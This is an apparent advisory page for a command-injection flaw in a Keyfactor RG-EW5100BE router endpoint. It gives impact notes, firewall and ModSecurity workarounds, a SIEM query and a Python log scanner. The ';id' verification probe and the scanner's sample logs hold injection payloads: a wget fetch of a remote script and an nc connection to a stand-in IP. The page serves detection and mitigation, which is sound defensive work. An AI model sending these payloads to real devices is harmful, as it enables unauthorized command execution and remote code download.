CVE-2025-11073

4.7 MEDIUM

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary OS commands on Keyfactor RG-EW5100BE devices by injecting shell metacharacters into the url parameter of the /cgi-bin/luci/api/cmd endpoint. The affected firmware build is EW_3.0B11P280_EW5100BE-PRO_12183019. The exploit record lists the issue as exploitable without authentication; the 4.7 base score, however, implies a Privileges Required value other than None, so check the published CVSS vector before treating this as a pre-auth issue.

💻 Affected Systems

Products:
  • Keyfactor RG-EW5100BE
Versions: EW_3.0B11P280_EW5100BE-PRO_12183019
Operating Systems: Embedded Linux (firmware-specific)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default configuration of the specified firmware version. No special configuration is required for exploitation.

⚠️ Manual Verification Required

This CVE names a single firmware build but no version range, so automatic vulnerability detection cannot determine from a version string alone whether your system is affected.

Why? The CVE database entry gives no version ranges (none were provided by the vendor/NVD), only the one build listed above.


Recommended Actions:
  1. Review the CVE details at NVD
  2. Check vendor security advisories for your specific version
  3. Test if the vulnerability is exploitable in your environment
  4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, exfiltrate sensitive data, or use the device as part of a botnet.

🟠 Likely Case

Attackers gain shell access to execute commands, potentially installing cryptocurrency miners, conducting DDoS attacks, or using the device for network reconnaissance.

🟢 If Mitigated

Limited impact with proper network segmentation and monitoring, potentially only affecting the isolated device without lateral movement.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable via HTTP POST requests, making internet-facing devices immediate targets.
🏢 Internal Only: MEDIUM - Internal devices are still vulnerable but require network access; risk increases if attackers gain initial foothold elsewhere.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes (as recorded; see note below)
Complexity: LOW

Proof-of-concept exploit code is publicly available on GitHub, so exploitation needs little skill once the request format is known. Note that the 4.7 base score does not match an unauthenticated vector: a network, low-complexity, no-privileges attack with even low C/I/A impact scores 7.3 under CVSS 3.1. Reconcile the "unauthenticated" flag with the Privileges Required metric of the published vector before prioritising on that basis.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: UNKNOWN

Vendor Advisory: NOT AVAILABLE

Restart Required: No

Instructions:

No official patch is currently available. Monitor Keyfactor security advisories for updates. Consider workarounds or device replacement if no patch is forthcoming.

🔧 Temporary Workarounds

Network Access Control

Applies to: all

Restrict access to the device's web interface (and with it the vulnerable endpoint) to trusted management hosts, using an upstream firewall or the device's own firewall. With iptables, the negated source is written as "! -s" (modern iptables rejects the "-s !" form), and the rules must sit ahead of any existing ACCEPT rule for the web ports, since -A appends and the first match wins; -I inserts at the top:

iptables -I INPUT -p tcp --dport 80 ! -s TRUSTED_IP -j DROP
iptables -I INPUT -p tcp --dport 443 ! -s TRUSTED_IP -j DROP

Rules added on the device itself do not survive a reboot unless saved in the firmware's firewall configuration, so prefer enforcing this upstream.

Web Application Firewall

Applies to: all

Deploy WAF rules that block command injection patterns in the url parameter of POST requests to /cgi-bin/luci/api/cmd. Scope the rule to that path so it does not fire on every form on the device, by chaining a path check with the argument check.

ModSecurity rule (requires SecRequestBodyAccess On, otherwise ARGS never includes POST-body parameters):

SecRule REQUEST_URI "@beginsWith /cgi-bin/luci/api/cmd" "id:1001,phase:2,deny,log,msg:'Command Injection Attempt',chain"
    SecRule ARGS:url "@rx [;&|`$()]"

Because a url parameter legitimately contains & and sometimes $ or parentheses, expect false positives from this character class; once you have seen legitimate traffic, narrow it to the metacharacters that actually enable shell injection (; | ` $( ${ and newlines).

🧯 If You Can't Patch

  • Isolate affected devices in a separate VLAN with strict egress filtering
  • Implement network monitoring for unusual outbound connections or command execution patterns

🔍 How to Verify

Check if Vulnerable:

Check the firmware version via the web interface or over SSH (the /etc/version path may differ by firmware): grep EW_3.0B11P280 /etc/version

Check Version:

ssh admin@device_ip 'cat /etc/version' or check the web admin interface

Verify Fix Applied:

Test whether command injection is still possible by sending a POST request to /cgi-bin/luci/api/cmd with a url parameter containing ;id and looking for the id command's output (uid=...) in the response. A fixed device returns no command output and should reject the request.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /cgi-bin/luci/api/cmd whose url parameter contains shell metacharacters (;, &, |, `, $), including their URL-encoded forms (%3B, %26, %7C, %60, %24), which a literal match on the raw character misses

Network Indicators:

  • Unusual outbound connections from the device, especially to known C2 servers or cryptocurrency pools, and any outbound connection initiated shortly after a hit on the endpoint above

SIEM Query:

source="device_logs" AND uri="/cgi-bin/luci/api/cmd" AND (url="*;*" OR url="*&*" OR url="*|*" OR url="*`*" OR url="*$(*")

This query only works if the log source records the POST parameter (a WAF audit log or request-body logging); a standard web server access log keeps the request line and status only, so the url field is never populated from it. The "*&*" term matches legitimate query strings inside the url parameter; drop or down-weight it if it is noisy.
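As an added example (not code from this page or from the vendor), here is the log-indicator logic above, which also serves as the argument check of the WAF rule, run over constructed sample records: it mirrors the SIEM query's path and metacharacter checks, URL-decodes the url parameter first so percent-encoded metacharacters are caught, and reports a lone & at lower confidence because it is legal in query strings. The JSON field names source/uri/url are assumed to match the SIEM query and the method field is assumed; the sample records are constructed, not captured.

```python
import json
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample records (not captured from a real device). Field names
# follow the SIEM query above: source, uri, url; "method" is an assumption.
SAMPLE_LOGS = """\
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/cmd", "url": "http://example.com/fw.bin"}
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/cmd", "url": "http://example.com/x;id"}
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/cmd", "url": "http://a.b/$(wget http://198.51.100.7/s.sh)"}
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/cmd", "url": "http://a.b/`nc 198.51.100.7 4444`"}
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/cmd", "url": "http://example.com/x%3Bid"}
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/cmd", "url": "http://example.com/?a=1&b=2"}
{"source": "device_logs", "method": "GET", "uri": "/cgi-bin/luci/", "url": ""}
{"source": "device_logs", "method": "POST", "uri": "/cgi-bin/luci/api/auth", "url": "x;id"}
"""

TARGET_URI = "/cgi-bin/luci/api/cmd"

# High-confidence shell metacharacters: command separators, pipes, backticks,
# $( ) / ${ } expansion, && chaining and embedded newlines.
HIGH = re.compile(r"[;|`\n]|\$\(|\$\{|&&")
# A single & is in the indicator list but is legal in URL query strings,
# so it is reported separately at low confidence.
LOW = re.compile(r"&(?!&)")


def classify(record: dict) -> Tuple[Optional[str], str]:
    """Return (severity, decoded_url) for one parsed log record.

    severity is "high", "low" or None (no hit). Only POSTs to the
    vulnerable endpoint are considered; records without a method field
    are assumed to be POSTs.
    """
    if record.get("method", "POST") != "POST" or record.get("uri") != TARGET_URI:
        return None, ""
    # Decode once so %3B, %24%28 and friends are matched as ; and $(.
    url = unquote(record.get("url", ""))
    if HIGH.search(url):
        return "high", url
    if LOW.search(url):
        return "low", url
    return None, url


def scan(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Run classify over newline-delimited JSON records; skip blank/bad lines."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue
        severity, url = classify(record)
        if severity:
            hits.append((severity, url))
    return hits


if __name__ == "__main__":
    for severity, url in scan(SAMPLE_LOGS.splitlines()):
        print(f"[{severity:4}] {url}")
```

Running the block over the constructed records flags the four records carrying ; $( ` and the percent-encoded ; as high, the query-string record as low, and ignores the GET and the request to a different luci endpoint. Feed it real WAF audit records by replacing SAMPLE_LOGS with a file iterator.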
